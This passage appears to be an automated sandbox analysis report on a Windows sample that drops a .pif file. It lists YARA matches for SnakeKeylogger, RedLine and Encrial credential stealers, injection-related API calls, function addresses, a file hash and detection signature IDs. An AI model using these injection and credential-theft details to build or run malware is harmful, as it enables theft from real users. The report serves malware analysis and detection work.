Source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.y79a2l1FY5.exe.212fcdd8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.1.dajivhqI.pif.438038.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000007.00000001.881378637.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.3350716480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: Process Memory Space: dajivhqI.pif PID: 6164, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029D421C GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_029D421C
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029D3380 NtWriteVirtualMemory,	0_2_029D3380
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029D3034 NtAllocateVirtualMemory,	0_2_029D3034
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029D9654 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_029D9654
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029D9738 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_029D9738
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029D95CC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_029D95CC
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029D3B44 NtUnmapViewOfSection,	0_2_029D3B44
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029D38D4 NtReadVirtualMemory,	0_2_029D38D4
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029D421A GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_029D421A
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029D3032 NtAllocateVirtualMemory,	0_2_029D3032
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029D9578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_029D9578

Source: C:\Users\user\Desktop\y79a2l1FY5.exe

Code function: 0_2_029DA634 InetIsOffline,Sleep,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,

0_2_029DA634

Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029C20B4	0_2_029C20B4
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_00408C60	7_2_00408C60
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_0040DC11	7_2_0040DC11
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_00407C3F	7_2_00407C3F
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_00418CCC	7_2_00418CCC
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_00406CA0	7_2_00406CA0
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_004028B0	7_2_004028B0
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_0041A4BE	7_2_0041A4BE
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_00418244	7_2_00418244
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_00401650	7_2_00401650
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_00402F20	7_2_00402F20
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_004193C4	7_2_004193C4
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_00418788	7_2_00418788
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_00402F89	7_2_00402F89
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_00402B90	7_2_00402B90
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_004073A0	7_2_004073A0
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_29DC1198	7_2_29DC1198
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_29DC11A8	7_2_29DC11A8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_29DC1448	7_2_29DC1448
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_29DC1438	7_2_29DC1438
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2A1CB270	7_2_2A1CB270
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2A1C4290	7_2_2A1C4290
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2A1CBB60	7_2_2A1CBB60
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2A1C8129	7_2_2A1C8129
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2A1C6F70	7_2_2A1C6F70
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2A1C4282	7_2_2A1C4282
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2A1CAAD8	7_2_2A1CAAD8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2A1CAAE8	7_2_2A1CAAE8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2A1CF130	7_2_2A1CF130
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2A1CF121	7_2_2A1CF121
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2A1CF9CF	7_2_2A1CF9CF
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2A1CF9E0	7_2_2A1CF9E0
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2A1C6F63	7_2_2A1C6F63
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2A1CB490	7_2_2A1CB490
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2A1CECD8	7_2_2A1CECD8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2A1CECC8	7_2_2A1CECC8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2A1CF57A	7_2_2A1CF57A
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2A1CF588	7_2_2A1CF588
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFE5D0	7_2_2DAFE5D0
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF5938	7_2_2DAF5938
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF34A0	7_2_2DAF34A0
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF0498	7_2_2DAF0498
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF0040	7_2_2DAF0040
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF6712	7_2_2DAF6712
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF0AF8	7_2_2DAF0AF8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF8DB8	7_2_2DAF8DB8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFBD80	7_2_2DAFBD80
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFC1C8	7_2_2DAFC1C8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFE5C0	7_2_2DAFE5C0
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFC1D8	7_2_2DAFC1D8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFB928	7_2_2DAFB928
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFDD20	7_2_2DAFDD20
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFB919	7_2_2DAFB919
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFDD11	7_2_2DAFDD11
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFE169	7_2_2DAFE169
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFE178	7_2_2DAFE178
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFBD70	7_2_2DAFBD70
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFD8B9	7_2_2DAFD8B9
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF0487	7_2_2DAF0487
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFD8C8	7_2_2DAFD8C8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFB4C0	7_2_2DAFB4C0
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFB4D0	7_2_2DAFB4D0
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFAC20	7_2_2DAFAC20
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF3038	7_2_2DAF3038
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF8C30	7_2_2DAF8C30
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFD008	7_2_2DAFD008
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF0006	7_2_2DAF0006
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFD018	7_2_2DAFD018
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFAC11	7_2_2DAFAC11
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFB068	7_2_2DAFB068
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFD461	7_2_2DAFD461
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFB078	7_2_2DAFB078
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFD470	7_2_2DAFD470
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF3048	7_2_2DAF3048
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFCBAF	7_2_2DAFCBAF
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFA7B8	7_2_2DAFA7B8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF2789	7_2_2DAF2789
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF2798	7_2_2DAF2798
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF2BE0	7_2_2DAF2BE0
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF2BF0	7_2_2DAF2BF0
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFA7C8	7_2_2DAFA7C8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFCBC0	7_2_2DAFCBC0
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF2330	7_2_2DAF2330
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF9F08	7_2_2DAF9F08
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF9F18	7_2_2DAF9F18
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFA361	7_2_2DAFA361
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFA370	7_2_2DAFA370
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF2340	7_2_2DAF2340
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF9AB1	7_2_2DAF9AB1
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFEE80	7_2_2DAFEE80
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF0A9D	7_2_2DAF0A9D
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF1A90	7_2_2DAF1A90
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF1EE8	7_2_2DAF1EE8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFF2C8	7_2_2DAFF2C8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF9AC0	7_2_2DAF9AC0
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFF2D8	7_2_2DAFF2D8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF1ED8	7_2_2DAF1ED8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFEA28	7_2_2DAFEA28
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFC620	7_2_2DAFC620
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFC630	7_2_2DAFC630
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF9200	7_2_2DAF9200
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFEA19	7_2_2DAFEA19
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF9210	7_2_2DAF9210
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF9668	7_2_2DAF9668
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF1A7F	7_2_2DAF1A7F
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAFEE70	7_2_2DAFEE70
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DAF9658	7_2_2DAF9658
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DB82EB8	7_2_2DB82EB8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DB82850	7_2_2DB82850
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DB80B30	7_2_2DB80B30
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DB821E8	7_2_2DB821E8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DB84040	7_2_2DB84040
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DB81B80	7_2_2DB81B80
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DB82EA8	7_2_2DB82EA8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DB82840	7_2_2DB82840
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DB80B20	7_2_2DB80B20
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DB821D8	7_2_2DB821D8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DB84030	7_2_2DB84030
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DB80007	7_2_2DB80007
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DB80040	7_2_2DB80040
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DB81B71	7_2_2DB81B71
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DB83550	7_2_2DB83550
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2DB83540	7_2_2DB83540
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2E1A1E40	7_2_2E1A1E40
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2E1A9E98	7_2_2E1A9E98
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_2E1A2DC0	7_2_2E1A2DC0
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_1_00408C60	7_1_00408C60
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_1_0040DC11	7_1_0040DC11
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_1_00407C3F	7_1_00407C3F
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_1_00418CCC	7_1_00418CCC
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_1_00406CA0	7_1_00406CA0
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_1_004028B0	7_1_004028B0
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_1_0041A4BE	7_1_0041A4BE
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_1_00418244	7_1_00418244
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_1_00401650	7_1_00401650
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_1_00402F20	7_1_00402F20
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_1_004193C4	7_1_004193C4
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_1_00418788	7_1_00418788
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_1_00402F89	7_1_00402F89
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_1_00402B90	7_1_00402B90
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_1_004073A0	7_1_004073A0

Source: Joe Sandbox View

Dropped File: C:\Users\user\Links\dajivhqI.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301

Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: String function: 029D3E9C appears 45 times
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: String function: 029D3E20 appears 54 times
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: String function: 029C4414 appears 246 times
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: String function: 029C421C appears 64 times
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: String function: 029C457C appears 835 times
Source: C:\Users\user\Links\dajivhqI.pif	Code function: String function: 0040D606 appears 48 times
Source: C:\Users\user\Links\dajivhqI.pif	Code function: String function: 0040E1D8 appears 88 times

Source: y79a2l1FY5.exe, 00000000.00000002.883646315.0000000002860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs y79a2l1FY5.exe
Source: y79a2l1FY5.exe, 00000000.00000002.883646315.0000000002860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs y79a2l1FY5.exe
Source: y79a2l1FY5.exe, 00000000.00000003.878633103.000000000086E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs y79a2l1FY5.exe
Source: y79a2l1FY5.exe, 00000000.00000002.913174273.0000000020FB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs y79a2l1FY5.exe
Source: y79a2l1FY5.exe, 00000000.00000003.880472759.0000000000852000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs y79a2l1FY5.exe
Source: y79a2l1FY5.exe, 00000000.00000002.913716413.00000000212B7000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs y79a2l1FY5.exe
Source: y79a2l1FY5.exe, 00000000.00000003.878119908.000000007EBC0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs y79a2l1FY5.exe
Source: y79a2l1FY5.exe, 00000000.00000003.878119908.000000007EC06000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs y79a2l1FY5.exe
Source: y79a2l1FY5.exe, 00000000.00000003.878119908.000000007EC06000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs y79a2l1FY5.exe
Source: y79a2l1FY5.exe, 00000000.00000002.913261690.00000000210D9000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs y79a2l1FY5.exe
Source: y79a2l1FY5.exe, 00000000.00000003.877707933.000000007ED16000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs y79a2l1FY5.exe
Source: y79a2l1FY5.exe, 00000000.00000003.877707933.000000007ED16000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs y79a2l1FY5.exe
Source: y79a2l1FY5.exe, 00000000.00000003.878633103.000000000089E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs y79a2l1FY5.exe

Source: y79a2l1FY5.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 7.1.dajivhqI.pif.46b268.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.dajivhqI.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.1.dajivhqI.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.dajivhqI.pif.438038.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.dajivhqI.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.y79a2l1FY5.exe.212c9ba8.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.1.dajivhqI.pif.438038.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.y79a2l1FY5.exe.212c9ba8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.dajivhqI.pif.46b268.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.1.dajivhqI.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
